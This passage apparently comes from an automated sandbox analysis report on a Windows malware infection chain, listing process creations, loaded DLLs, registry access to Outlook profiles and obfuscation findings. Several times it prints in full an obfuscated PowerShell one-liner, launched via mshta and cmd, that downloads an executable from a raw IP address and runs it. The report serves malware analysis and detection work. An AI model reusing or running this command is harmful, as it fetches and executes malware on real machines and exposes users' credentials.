3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES94CA.tmp" "c:\Users\user\AppData\Local\Temp\qfzuxwqd\CSCADD237997B8E4BD496D9E414C49E4A6C.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\vcc.exe "C:\Users\user\AppData\Roaming\vcc.exe"
                    Source: C:\Users\user\AppData\Roaming\vcc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\vcc.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\vcc.exe "C:\Users\user\AppData\Roaming\vcc.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES94CA.tmp" "c:\Users\user\AppData\Local\Temp\qfzuxwqd\CSCADD237997B8E4BD496D9E414C49E4A6C.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\vcc.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Binary string: wntdll.pdbUGP source: vcc.exe, 0000000B.00000003.1357954160.00000000032D0000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 0000000B.00000003.1355704739.0000000003450000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: vcc.exe, 0000000B.00000003.1357954160.00000000032D0000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 0000000B.00000003.1355704739.0000000003450000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.pdb source: powershell.exe, 00000003.00000002.1360527053.0000000004C67000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    PowerShell case anomaly found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; 